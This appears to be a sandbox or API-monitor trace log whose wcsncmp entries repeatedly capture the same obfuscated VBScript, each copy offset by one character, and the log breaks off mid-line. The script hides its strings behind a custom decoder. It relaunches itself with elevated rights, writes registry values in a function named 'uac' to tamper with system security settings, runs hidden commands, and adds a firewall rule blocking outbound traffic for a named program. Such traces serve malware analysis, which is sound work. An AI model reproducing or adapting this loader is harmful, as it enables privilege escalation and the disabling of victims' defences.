WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0223.007] wcsncmp (_String1="\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.007] wcsncmp (_String1="rules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.007] wcsncmp (_String1="ules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.008] wcsncmp (_String1="les.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.008] wcsncmp (_String1="es.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 